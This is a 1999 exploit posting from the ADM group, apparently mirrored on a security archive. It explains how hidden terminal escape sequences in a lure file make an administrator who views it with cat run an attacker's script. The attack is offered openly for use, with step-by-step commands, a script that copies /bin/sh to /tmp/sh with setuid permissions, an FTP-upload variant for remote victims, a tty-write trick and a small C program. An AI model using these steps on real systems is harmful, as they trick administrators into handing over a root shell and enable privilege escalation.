exploit the possibilities

ADMesc

ADMesc
Posted Sep 23, 1999

ADMesc

MD5 | a277808785401d2e52bd81f4ce58f286

ADMesc

Change Mirror Download

___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
..oO THE | --- | | / | | | | CreW Oo..
''' ''' ''''''' '''' ''''
presents

the evil ESC sequences



hi well here is describe a bug seem affects UNIX .. (Linux/BSD/Sunos)

he can just compromise the root ... ( or any users on the system ..)

bugs:

[root@ADM root]#echo -e "\033\132"

[root@ADM root]#6c
bash: 6c: command not found
[root@ADM root]#

well the ESC\132 put 6c on your cmb line just need to tape enter ...

how to use for r00ted som1 ??? very very easy heheh :)

1:

[xbug@ADM XbuG]$touch passwd-list-of-ftp-warez
[xbug@ADM XbuG]$echo -e "\033[30m\033\132" >> passwd-list-of-ftp-warez

2:

make the proggies 6c ..

[xbug@ADM XbuG]$cat > 6c
#!/bin/sh
cp /bin/sh /tmp/sh
chmod 4777 /tmp/sh
^C
[xbug@ADM XbuG]$chmod +x 6c

3:

now if the root make a cat or a more on your file passwd-list-of-ftp-warez ..
he can be 0wnd hhe

[root@ADM XbuG]#cat passwd-list-of-ftp-warez

( now if i type enter i'm ownd .. u cant see the 6c because the ESC[30m
cache him .. ;)


note: humm on other term that be != of 6c .. try out first :)

ps: hehehe that can be remote too...

<Raw-Powa> u can get remote access with it
<Raw-Powa> ftp victim
<Raw-Powa> cd incoming
<dxmechie> remote?
<Raw-Powa> put 6c
<dxmechie> hha
<Raw-Powa> chmod +x 6c
<Raw-Powa> put EvillFilEzInFecTeD

hey a other trik ...

u can do echo -e "\033\132..." >> /dev/ttyXX

yahoooo :)


i'm sure they have 36568 ways for sploit diz b00g have fun :>

---[bloody echo]--------------------------------------------------------------
#include <stdio.h>

void main () {

(void) printf("\033[30m"); /* black color */
(void) printf("\033\132"); /* evil escape sequences */

}
-------------------------------------------------------------------------------

credits: Heike even ...

cut/n/past

#hax heike-raw H@ ~d0@raid0.toxyn.org (d0)
#hax ^Che H@ ahg@geisli-93.centrum.is (Ernesto Che Guevara)
#hax appel H@ appel@appel.isirc.is (Já, ég nota ullarnærföt!)
#hax crazy-b H@ ~crazy-b@t5o207p20.telia.com (crazy-b)
#hax SLUT H@ crazy-b@music.is (digit 0WNS me)
#hax su1d H@ teddi@irc.music.is (Theodor Ragnar Gislason)
#hax NetGuru H@ ~netguru@hp735.cs.uni-magdeburg.de (NetGuru of
deep/CyberDyne)
#hax CUNT H@ crazy-b@josva.dataguard.no (BugTester - DataGuard)
#hax Ph\\Je H@ lice@dat95kjn.campus.mdh.se (d4 phuqen ph4lze
j3h0va)
#hax zh4p H@ wiltsu@rai.rauma.fi ("try to smoke me up")
#hax DiGiT H@ teddi@geisli-26.centrum.is (warp speeds..
)


Cya.

Check out .. or die :) ftp.janova.org/pub/ADM
ADM@janova.org

Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    11 Files
  • 19
    Jun 19th
    1 Files
  • 20
    Jun 20th
    3 Files
  • 21
    Jun 21st
    2 Files
  • 22
    Jun 22nd
    21 Files
  • 23
    Jun 23rd
    19 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close